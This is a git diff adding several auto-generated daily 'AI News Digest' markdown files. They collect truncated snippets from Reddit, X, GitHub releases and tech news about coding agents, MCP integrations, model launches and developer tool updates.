+ +--- + +## [Qwen Code v0.15.5 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.5) +*GitHub Releases · Qwen Code* | 29/04/2026 | Score: 0.94 +Tags: mcp, cli_tool + +> ## What's Changed * mcp config as cli by @eliird in https://github.com/QwenLM/qwen-code/pull/1279 * fix(cli): refresh static header on model switch by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3667 * feat(core): wire background shells into the task_stop tool by @wenshao in https://github.com/QwenLM/qwen-code/pull/3687 * feat(skills): add tmux-real-user-testing skill for readable TUI test logs by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3577 * feat(cli): wire backgrou + +--- + +## [The final nail in the coffin for entry level creative freelancers just dropped](https://reddit.com/r/ClaudeAI/comments/1syu949/the_final_nail_in_the_coffin_for_entry_level/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.94 +Tags: api_update, mcp + +> Anthropic just officially released the blender mcp connector today alongside adobe ,splice and sketchup, you can now type "create a low poly beach scene with palm trees and sunset lighting" into claude and watch it build the entire thing in blender in real time tadaaa. They even became an official blender development fund patron This is claude directly controlling blender through the python api which means it can modify existing scenes, debug your node setups, batch apply changes across objects + +--- + +## [Launched My First App Using Claude](https://reddit.com/r/ClaudeAI/comments/1sz38u6/launched_my_first_app_using_claude/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.86 +Tags: api_update, tool_update + +> Hello everyone. About a week ago, I was able to launch my very own app, all of it being built by Claude. It’s a vehicle management app. 
Allows you to keep track of how much you’re spending on your car(s), comes with a built in maintenance schedule that’s customizable, fuel tracking system, a showroom mode for people who would like to showcase their vehicles, and an AI assistant (Claude API). It’s all front end, and everything is stored locally on the users device. The API calls do require a da + +--- + +## [Claude Design is amazing but I keep hitting rate limits. Tested an open source skill that runs on your normal subscription limits — here's both outputs for you to judge.](https://reddit.com/r/ClaudeAI/comments/1sz1rca/claude_design_is_amazing_but_i_keep_hitting_rate/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.78 +Tags: api_update, open_source + +> Claude design is genuinely great for building HTML layouts and presentations. the problem is it burns through your usage fast — i was hitting limits after a few iterations. Found an open source claude code skill called huashu-design that does the same kind of thing (HTML prototypes, slide decks, animations) but runs through your normal claude code subscription. no separate rate limit. Wanted to see how they actually compare, so i gave both the exact same prompt. one shot each, no follow-up e + +--- + +## [Fully 3D-modeled Raspberry Pi 5 enclosure made 100% through Claude's Blender MCP, zero manual modeling](https://reddit.com/r/ClaudeAI/comments/1sz748q/fully_3dmodeled_raspberry_pi_5_enclosure_made_100/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 +Tags: mcp, tool_update + +> So I've been experimenting with Claude's new Blender MCP integration and decided to push it to its limits with a real engineering project: a complete, print-ready enclosure for the Raspberry Pi 5, modeled entirely through AI prompts, no hands on keyboard in Blender at all. 
**What Claude did autonomously:** * Researched and confirmed the official Raspberry Pi 5 mechanical dimensions from the datasheet (85×56mm PCB, exact mounting hole positions at 3.5/61.5 × 3.5/52.5mm) * Mapped every port and + +--- + +## [Pattern I'm using to keep Claude Code productive on overnight unattended runs](https://reddit.com/r/ClaudeAI/comments/1syr2pt/pattern_im_using_to_keep_claude_code_productive/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 +Tags: api_update, developer_tool + +> Been running Claude Code on multi-hour autonomous sessions for a few months and kept hitting the same wall: the longer it runs, the worse the work gets. Not a context-window problem (1M handles that fine), but a feedback-loop problem. Iteration N+10 makes the same mistakes it made at iteration N, because nothing updates between iterations except the code. Built a small framework around three pieces that, between them, solved it for me. Together this framework has enabled me to consistently run v + +--- + +## [Your Claude Code project dashboard is now on the Mac App Store](https://reddit.com/r/ClaudeAI/comments/1symv0c/your_claude_code_project_dashboard_is_now_on_the/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 +Tags: mcp, cli_tool + +> Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. App Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691) Quick recap if you missed the original. Storybloq is a project tracker that lives in `.story/` inside your repo. Tickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. 
The CLI and MCP server expose it to + +--- + +## [LosslessCut v3.68.0 released](https://github.com/mifi/lossless-cut/releases/tag/v3.68.0) +*GitHub Releases · LosslessCut* | 29/01/2026 | Score: 0.70 +Tags: github_release, tool_update + +> ⚠️ **Warning:** The keyboard handling has changed as of v3.67.0 and later. If you after upgrading to this version ever revert to a version prior to v3.67.0, you **will lose your keyboard bindings**. Also there's an issue with migrating certain shortcuts with some keyboard layouts to the new version. See [TLDR here.](https://github.com/mifi/lossless-cut/issues/2671#issuecomment-3727638311) Note: there's a bug with the [app size of this version being larger](https://github.com/mifi/lossless-cut + +--- + +## [I built a Kanban board for Claude Code so I can run agent sessions straight from cards](https://reddit.com/r/ClaudeAI/comments/1sye8bs/i_built_a_kanban_board_for_claude_code_so_i_can/) +*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.54 +Tags: open_source, cli_tool + +> I've been running 4-5 Claude Code sessions in parallel and kept losing track - which terminal had the auth work, which one was the bug fix, what's actually done. So I added a Kanban board to **Vibeyard** (an open-source IDE I'm building for Claude Code). Each card is a task. Click run → it spins up a Claude session scoped to that task. When Claude finishes, the card moves itself to Done. It turned Claude from "a terminal I talk to" into + +--- + +## [Are we underweighting execution benchmarks when we talk about open-source frontier models?](https://reddit.com/r/StableDiffusion/comments/1szb07b/are_we_underweighting_execution_benchmarks_when/) +*Reddit r/StableDiffusion* | 29/04/2026 | Score: 1.00 +Tags: open_source + +> A lot of open-source model discussion still centers on broad IQ-style evals or raw one-turn quality. What feels underdiscussed to me is whether execution-heavy evaluation is becoming its own frontier. 
Ling-2.6-1T being open-sourced on Hugging Face today is one reason I’m thinking about this. Its stated profile is unusually explicit: precise instruct execution, strong results on execution-heavy / agentic tasks, low token overhead, and long-context task handling. If more frontier open models + +--- + diff --git a/data/digest-2026-04-30.md b/data/digest-2026-04-30.md new file mode 100644 index 0000000..581a568 --- /dev/null +++ b/data/digest-2026-04-30.md @@ -0,0 +1,117 @@ +# Stack Scout - AI News Digest +**2026-04-30** | 15 stories | Auto-generated from 692 archived stories + +--- + +## [[Open Source] We built a local code search MCP for Claude Code that uses ~98% fewer tokens than grep+read](https://reddit.com/r/ClaudeAI/comments/1szvo7t/open_source_we_built_a_local_code_search_mcp_for/) +*Reddit r/ClaudeAI* | 30/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> Working on large codebases with Claude Code, we kept running into the same issue: when Claude looks for relevant code, it falls back to grep, reading full files, or launching multiple subagents. This burns through tokens, and often misses the relevant code. There are some existing solutions (that we also benchmarked against), but they all had issues (too slow, needs API keys, quality not good enough, etc). We built [Semble](https://github.com/MinishLab/semble) to fix this. It's a local MCP serv + +--- + +## [The "Big Tech Steamroller" is coming for your AI agent. Before you write another line of code, ask yourself: "Can a trillion-dollar company do this with a single API update?" If the answer is yes, pivot now.](https://x.com/AI_BioPhD/status/2049769860897321027) +*X / @ai_biophd* | 30/04/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> The "Big Tech Steamroller" is coming for your AI agent. Before you write another line of code, ask yourself: "Can a trillion-dollar company do this with a single API update?" If the answer is yes, pivot now. 
+ +--- + +## [Cursor SDK — The Democratization of Agent Development](https://x.com/Marktechpost/status/2049711306643759265) +*Aligned News (Scoble)* | 30/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Cursor's SDK reduces agent deployment to three lines of TypeScript, democratizing agent development. The release is the AWS moment for agents, dramatically lowering the barrier to production deployment. + +--- + +## [Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:](https://x.com/Codex_Changelog/status/2049905403262079480) +*X / @codex_changelog* | 30/04/2026 | Score: 0.97 +Tags: cli_tool, tool_update + +> Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog: + +--- + +## [Show HN: Pu.sh – a full coding-agent harness in 400 lines of shell](https://pu.dev/) +*Hacker News* | 30/04/2026 | Score: 0.88 +Tags: cli_tool, agent_tool + +--- + +## [26 years ago I took a website management company public on NASDAQ (200+ staff, 60 engineers). Over just a few weekends I rebuilt a better product using Claude Code.](https://reddit.com/r/ClaudeAI/comments/1t00h8u/26_years_ago_i_took_a_website_management_company/) +*Reddit r/ClaudeAI* | 30/04/2026 | Score: 0.86 +Tags: mcp, open_source + +> Yeah, me again, same guy from [the Legends of Future Past post](https://www.reddit.com/r/ClaudeAI/comments/1sfsz67/i_gave_claude_my_dead_games_30yearold_files_and/) a few weeks back (where I resurrected a 30+ year old game I lost the source to from its script files, using Claude Code). A bunch of folks asked what else I was working on. This is it. LightCMS is now open source: [https://github.com/jonradoff/lightcms](https://github.com/jonradoff/lightcms) (MIT). 
About 47K lines of Go, 114 MCP too + +--- + +## [pnpm v11.0.3 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.3) +*GitHub Releases · pnpm* | 30/04/2026 | Score: 0.84 +Tags: developer_tool, cli_tool + +> ## Patch Changes * Fix too many open files error sometimes happening on Windows, when creating command shims in `node_modules/.bin` [#11412](https://github.com/pnpm/pnpm/issues/11412). * Fix `ERR_PNPM_FETCH_404` when installing a project whose lockfile depends on a `file:` tarball. The previous behavior dropped the `tarball` field from `file:` and git-hosted resolutions when `lockfile-include-tarball-url=false` (the default), even though those URLs cannot be reconstructed from the package na + +--- + +## [Vercel CLI @vercel/python-workers@0.0.20 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.20) +*GitHub Releases · Vercel CLI* | 30/04/2026 | Score: 0.76 +Tags: developer_tool, cli_tool + +> ### Patch Changes - 894e7d4: [python/vercel-workers] refactor framework-specific logic into vercel-workers + +--- + +## [Gemini CLI v0.40.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.40.1) +*GitHub Releases · Gemini CLI* | 30/04/2026 | Score: 0.70 +Tags: cli_tool, tool_update + +> ## What's Changed * fix(patch): cherry-pick 2194da2 to release/v0.40.0-pr-26153 to patch version v0.40.0 and create version 0.40.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/26268 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.40.0...v0.40.1 + +--- + +## [X announces a rebuilt ad platform powered by AI](https://techcrunch.com/2026/04/30/x-announces-a-rebuilt-ad-platform-powered-by-ai/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Stripe introduces Link, a digital wallet that autonomous AI agents can use, too](https://techcrunch.com/2026/04/30/stripe-link-digital-wallet-ai-agents-shopping/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + 
+## [The MCP Era Feels Like Déjà Vu](https://huggingface.co/blog/Navid-AI/mcp-era-feels-like-deja-vu) +*Hugging Face Blog* | Score: 1.00 +Tags: mcp + +--- + +## [Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https://claudedigest.com/tut…](https://x.com/ClaudeDigest/status/2049902211292127462) +*X / @claudedigest* | 30/04/2026 | Score: 1.00 +Tags: mcp + +> Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https://claudedigest.com/tutorials/mdx/mastering-claude-code … + +--- + +## [81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.](https://x.com/polsia/status/2049901864381288455) +*X / @polsia* | 30/04/2026 | Score: 1.00 +Tags: agent_tool + +> 81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process. + +--- + +## [MiMo-V2.5-Pro Matches Opus 4.6 at 8x Lower Cost — Open Weights](https://x.com/itsPaulAi/status/2049862276832715177) +*Aligned News (Scoble)* | 30/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent's take: MiMo-V2.5-Pro at 8x lower cost than Opus 4.6 is the open vs closed model story of 2026. The gap is closing fast. 
+ +--- + diff --git a/data/digest-2026-05-01.md b/data/digest-2026-05-01.md new file mode 100644 index 0000000..ac9324c --- /dev/null +++ b/data/digest-2026-05-01.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-01** | 15 stories | Auto-generated from 600 archived stories + +--- + +## [Built + open sourced anti-slopsquatting CLI](https://reddit.com/r/ClaudeAI/comments/1t0ltr5/built_open_sourced_antislopsquatting_cli/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.86 +Tags: open_source, developer_tool, cli_tool + +> TL;DR: built an open source CLI that scans your repository's manifest (package.json, requirements.txt, go.mod) files for indicators of slopsquatting or other supply chain attack indicators. Repo: https://github.com/zhendahu/dep-doctor There's been a ton of supply chain attacks recently ([Axios](https://github.com/axios/axios/issues/10636), [LiteLLM](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html), [Trivy](https://www.paloaltonetworks.com/blog/cloud-s + +--- + +## [Vercel CLI @vercel/python-workers@0.0.21 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.21) +*GitHub Releases · Vercel CLI* | 01/05/2026 | Score: 0.62 +Tags: api_update, developer_tool, cli_tool + +> ### Patch Changes - 6935baa: Refactor Python queue sdk into `_queue/` - 574c9f1: [vercel-workers] Replaces retention_seconds and delay_seconds with retention and delay which support timedelta, e.g retention=timedelta(hours=6) + +--- + +## [Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterpri…](https://x.com/firstadopter/status/2050264818972516799) +*X / @firstadopter* | 01/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Bonkers. Also, told y’all! 
OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterprise demand for agentic coding tools..” + +--- + +## [One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic codi…](https://x.com/OpenAI/status/2050250926888468929) +*X / @openai* | 01/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic coding tools keeps climbing. + +--- + +## [Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.](https://x.com/yunara97/status/2050108352550592636) +*X / @yunara97* | 01/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers. + +--- + +## [Hermes Agent Is Now in LM Studio — The Open-Source Agent Ecosystem Is Growing Fast](https://x.com/NousResearch/status/2049878944007041210) +*Aligned News (Scoble)* | 01/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hermes Agent's integration with LM Studio brings it to one of the most popular local model runners. The open-source agent ecosystem is maturing quickly. 
+ +--- + +## [Whohas – Command-line utility for cross-distro, cross-repository package search](https://github.com/whohas/whohas) +*Hacker News* | 01/05/2026 | Score: 0.99 +Tags: developer_tool, cli_tool + +--- + +## [Cloud Skills Are Still Just Skills - How Anthropic no longer releases new skills, and gates them within the Cloud now with Ultraplan, Ultrareview, and Cloud Security.](https://reddit.com/r/ClaudeAI/comments/1t0wlme/cloud_skills_are_still_just_skills_how_anthropic/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.86 +Tags: product_launch, tool_update + +> https://vexjoy.com/posts/cloud-skills-are-still-just-skills/ The skill ecosystem’s strength is composability. I can take a review skill, pair it with a Go agent, wrap it in a pipeline that saves artifacts at phase boundaries. I can inspect every piece. When something fails, I can diagnose it because I can read the prompts. You can’t compose what you can’t read, and you can’t diagnose failures in a stage you can’t inspect. If Anthropic ships more features this way, the ecosystem splits into ope + +--- + +## [Found Zero day Claude Desktop + Chromium bug need to know where to submit report.](https://reddit.com/r/ClaudeAI/comments/1t0u20d/found_zero_day_claude_desktop_chromium_bug_need/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 +Tags: mcp, developer_tool + +> Looking for official link / process to submit a vulnerability report for a high-risk official Claude Desktop + Chrome extension + native host + Cowork/MCP configuration that can become RAT-equivalent if a session, prompt chain, same-user process, or enabled extension is abused. Please let me know where I can submit this report. + +--- + +## [Example of using the GodotIQ MCP with Coding Agent to create video games](https://reddit.com/r/ClaudeAI/comments/1t0q8bf/example_of_using_the_godotiq_mcp_with_coding/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 +Tags: mcp, agent_tool + +> I’ve developed an MCP server for Godot. 
Most coding agents in Godot today work blindly: they read files but don’t know where the nodes are in space, don’t understand the signals, and don’t see what calls what. Godotiq solves this, giving the agent a true understanding of the 2D/3D scene, the code, and the editor. To test it, I gave it some free assets I found online and a prompt, and let it run for about an hour. It produced a mini twin-stick survivors-style game with waves, bosses, power-up ca + +--- + +## [Mobile App with Clade](https://reddit.com/r/ClaudeAI/comments/1t0obje/mobile_app_with_clade/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 +Tags: developer_tool, tool_update + +> Just a quick question. Is building a mobile app like this actually a legit approach? I recently came across someone building fairly complex web apps, for example a geo quiz with full database integration, using this workflow: He generates all the HTML, CSS and JS through Claude (the AI), deploys it to Netlify, connects a database like Supabase or Firebase, and then uses "Add to Homescreen" so it looks and feels like a native mobile app. No framework, no GitHub repo, no CI/CD, no app store. 
And h + +--- + +## [Turbo v2.9.7 released](https://github.com/vercel/turborepo/releases/tag/v2.9.7) +*GitHub Releases · Turbo* | 01/05/2026 | Score: 0.70 +Tags: github_release, tool_update + +> ## What's Changed ### eslint * chore: Upgrade dependencies to resolve their known vulnerabilities by @anthonyshew in https://github.com/vercel/turborepo/pull/12604 ### Examples * feat(sandbox): Bump @vercel/sandbox from v1 to beta by @marc-vercel in https://github.com/vercel/turborepo/pull/12595 * chore: Update examples to Turbo 2.9.6 by @cursor[bot] in https://github.com/vercel/turborepo/pull/12600 * examples + +--- + +## [Got tired of flying blind on Claude.ai usage, built a browser extension that surfaces token counts, cache timers, and rate limits](https://reddit.com/r/ClaudeAI/comments/1t0ti7h/got_tired_of_flying_blind_on_claudeai_usage_built/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.62 +Tags: api_update, developer_tool + +> I kept hitting the 5-hour limit out of nowhere and had no idea how close I was to the context window filling up mid-conversation. The fact that [Claude.ai](http://Claude.ai) shows you basically nothing about your actual usage drove me nuts, especially when I'd be deep in a long chat and suddenly get cut off. So I built a Chrome extension that adds a small dashboard to [claude.ai](http://claude.ai) showing real-time token counts per message, total context used, the prompt cache window timer (s + +--- + +## [You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate th…](https://x.com/_stephenbishop_/status/2050263244020015404) +*X / @_stephenbishop_* | 01/05/2026 | Score: 1.00 +Tags: mcp + +> You can now connect your Meta ads to Claude via MCP. 
Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate them > Re-launch on Meta + +--- + +## [VEED Launches AI Video Creation Tools — Helping Creators Produce at Scale](https://x.com/veedstudio) +*Aligned News (Scoble)* | 01/05/2026 | Score: 1.00 +Tags: product_launch + +> VEED continues developing AI video creation tools enabling content creators to produce polished video content at scale without professional editing expertise. The platform targets the growing market for AI-assisted video content creation for social and marketing applications. + +--- + diff --git a/data/digest-2026-05-02.md b/data/digest-2026-05-02.md new file mode 100644 index 0000000..c8c52d3 --- /dev/null +++ b/data/digest-2026-05-02.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-02** | 15 stories | Auto-generated from 459 archived stories + +--- + +## [@WesRoth: Meta Launches Ads MCP — Claude and ChatGPT Can Now Manage Meta Ad Accounts](https://x.com/WesRoth/status/2050606311440531809) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: mcp, product_launch, cli_tool, tool_update + +> Meta launched its Ads MCP and CLI, creating a direct bridge for frontier AI models like Claude and ChatGPT to access and interact with the Meta Ads ecosystem through natural language. + +--- + +## [I built a Claude Code skill that gives Claude real local time + session tracking (open source, one-line install)](https://reddit.com/r/ClaudeAI/comments/1t1xoca/i_built_a_claude_code_skill_that_gives_claude/) +*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> Built this with Claude Code over a few sessions open sourcing it. Claude has no built-in clock. Each session starts cold, training data is frozen in time, and when Claude says "the current time" it's hallucinating. Got tired of correcting it, so I built time-anchor. 
**What it does:** \- Auto-detects your timezone on install, no API key, no network call \- Reads the host system clock when you ask for the time (the trick: Python scripts in the skill can read the OS clock when Claude executes them via bash, Claude itself stays clockless, but it now has a tool it can query) \- Logs every session start/end so Claude can answer "how long have we been talking" or "what did I say 20 minutes ago" \- Persists in a local JSON file (or shares with another memory plugin via $TIME\_ANCHOR\_MEMORY\_PATH) \- \~85% of users get auto-detected (Windows tzutil, Linux /etc/localtime, $TZ). The remaining 15% type a city/country and get a paginated picker \- covering \~200 countries with their full IANA zone lists. Free + open source. MIT licensed, no telemetry, all state local. No paid tier, nothing to sign up for. #### Install (any OS, no git, no SSH, no plugin marketplace setup): **Windows (PowerShel… + +--- + +## [Parallelogram – a strict linter for LLM fine-tuning datasets (catches broken data before your GPU run starts)](https://reddit.com/r/StableDiffusion/comments/1t1sf5z/parallelogram_a_strict_linter_for_llm_finetuning/) +*Reddit r/StableDiffusion* | 02/05/2026 | Score: 1.00 +Tags: api_update, open_source, cli_tool + +> Fine-tuning frameworks assume your data is correctly formatted. None of them enforce it. The result is broken training runs discovered after the compute is spent. Parallelogram is a CLI tool that validates fine-tuning datasets before any training starts. Strict hard-blocks on role sequence errors, empty turns, context window violations, duplicates, and mojibake. Exits 0 on clean data, exits 1 on errors — CI/CD friendly. Apache 2.0, local-first, zero network calls. github.com/Thatayotlhe04/Par + +--- + +## [Tried running Claude Code with local LLMs via Ollama — ended up subscribing to Pro anyway. 
But now I can't disconnect from the local server.](https://reddit.com/r/ClaudeAI/comments/1t1vjd0/tried_running_claude_code_with_local_llms_via/) +*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> I've been experimenting with using Ollama to run Claude Code locally with models like Gemma 4, thinking I could avoid API costs. However, I quickly realised these models aren't really optimised for Claude Code's agentic workflows — they tend to get stuck in thinking loops and don't follow Claude Code's expected output structure well. So I ended up subscribing to Claude Pro anyway. The problem now is that even after logging into my Anthropic account through the terminal, Claude Code still connects to the local Ollama server no matter how many times I restart the terminal or VSCode. Just wondering how this can be solved, and also is it possible to run both local LLMs and claude models at the same time? + +--- + +## [Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Archite…](https://x.com/HudBeer/status/2050622456436818111) +*X / @hudbeer* | 02/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Architecture wins. + +--- + +## [Weekly Meal Planning Fully Automated with Claude and Migros MCP](https://x.com/hslu_aiml/status/2049100936287498456) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> A developer automated their weekly meal plan entirely using Claude and Migros's MCP integration, demonstrating how AI agents can handle grocery and meal planning end-to-end. 
+ +--- + +## [@ValsAI: GPT-5.5 Now #1 on Terminal Bench 2 — Updated Results Show +11% Improvement](https://x.com/ValsAI/status/2050240263420072446) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: cli_tool, tool_update + +> Vals AI updated GPT-5.5's results and it is now the #1 model on Terminal Bench 2, improving by +11%. It remains #2 on the overall Vals Index. + +--- + +## [I built "Semvec": A Constant-Cost Semantic Memory for LLMs (Looking for testers!)](https://reddit.com/r/ClaudeAI/comments/1t1ti3q/i_built_semvec_a_constantcost_semantic_memory_for/) +*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 +Tags: mcp, agent_tool + +> Hey everyone, If you build LLM applications, autonomous agents, or just use Claude/Cursor for coding, you've probably hit this wall: Conversation history grows infinitely, token costs explode, latency skyrockets, and eventually, the LLM starts forgetting early context anyway. To fix this, I built semvec. It replaces unbounded conversation histories with a fixed-size semantic state combined with a tiered, content-aware memory (short/medium/long-term). The result: The cost and latency of every LLM call stay constant. Turn 10 and Turn 10,000 carry the exact same input footprint. In 48-turn benchmarks, it yields roughly a 76% token reduction while retaining all structured access to decisions, error patterns, and prior context. Here is what you get: \- Constant-size compressed context: Token-reduced LLM context that stops growing. \- Tiered memory with selective forgetting: Frequently accessed older memories outlive never-touched newer ones. \- Drop-in chat proxy: Wrap any OpenAI-compatible LLM (vLLM, Ollama, OpenRouter) and get compressed context for free. \- Coding-agent compaction (MCP): Persistent memory across coding sessions. It comes with an MCP server for Claude Code & Curs… + +--- + +## [The OpenAI Prompting Guide Has Been Updated. 
🙌🏻 Check It Out 👏🏻](https://reddit.com/r/ChatGPT/comments/1t1tgok/the_openai_prompting_guide_has_been_updated_check/) +*Reddit r/ChatGPT* | 02/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> A great resource for learning how to prompt better and get the most out of ChatGPT 5.5: https://developers.openai.com/api/docs/guides/prompt-guidance?model=gpt-5.5 🤙🏻 + +--- + +## [I reverse-engineered the Perplexity app and built an MCP that turns your Perplexity/Comet account into a Claude MCP, so Claude can search like crazy and read 200+ sources in one answer with your personal account subscription without API product needed. [Experiment - Educational Purpose]](https://reddit.com/r/ClaudeAI/comments/1t1pdqc/i_reverseengineered_the_perplexity_app_and_built/) +*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Here's video showcase: [***https://youtu.be/wErgEe9Pgqo***](https://youtu.be/wErgEe9Pgqo) + +--- + +## [Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base t…](https://x.com/genondemand3d/status/2050539325763293222) +*X / @genondemand3d* | 02/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base training and mcp and hopefully it'll grow + +--- + +## [xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. 
The release emphasizes real-tim…](https://x.com/mehedi_u/status/2050462001571504588) +*X / @mehedi_u* | 02/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-time speed, targeting developers building + +--- + +## [Hermes Just Beat Claude Code in GitHub Stars and Nobody Is Talking About It](https://x.com/aakashgupta/status/2050349093969694825) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Braygent highlights the Hermes GitHub star milestone as the underreported open source AI agent story of the week, arguing it signals a turning point in open versus closed AI competition. + +--- + +## [Pika Just Let You Give Claude a Face and Make Videos Through Conversation](https://x.com/pika_labs/status/2050294291998933455) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> Braygent highlights the Pika MCP as a genuinely new Claude integration category that gives the assistant a custom identity and full video production capabilities, not just tool access. + +--- + +## [NVIDIA's Open Source Enterprise AI Agent Security Layer Is More Important Than People Realize](https://x.com/NVIDIAAI/status/2050336285428998202) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Braygent argues NVIDIA's open source OpenShell is the infrastructure unlock for enterprise AI agent deployment, with the open source design being crucial for security team auditability. 
+ +--- + diff --git a/data/digest-2026-05-03.md b/data/digest-2026-05-03.md new file mode 100644 index 0000000..e865486 --- /dev/null +++ b/data/digest-2026-05-03.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-03** | 15 stories | Auto-generated from 379 archived stories + +--- + +## [EasyUI – built over many months, late nights, and real dedication. Now 100% open-source.](https://reddit.com/r/StableDiffusion/comments/1t2toa5/easyui_built_over_many_months_late_nights_and/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> • Run ComfyUI workflows (txt2img, img2img, img2vid, vid2vid and more) • Execute Python scripts • Chat with LLMs (Ollama) • Templates & favorite templates • Plugin system • Tag system, wildcards, chants • Mask editor & crop tool • Drawing & coloring tools (inpaint) • Sessions management • Dark mode & login system • Media upload (drag & drop) • Audio trimming & txt2voice • Multi-language (Arabic, English, Chinese, Japanese) • Edit & resend prompts • Regenerate & resend images • Negative prompt support • And much more... Made with effort. Released with love. 🔗 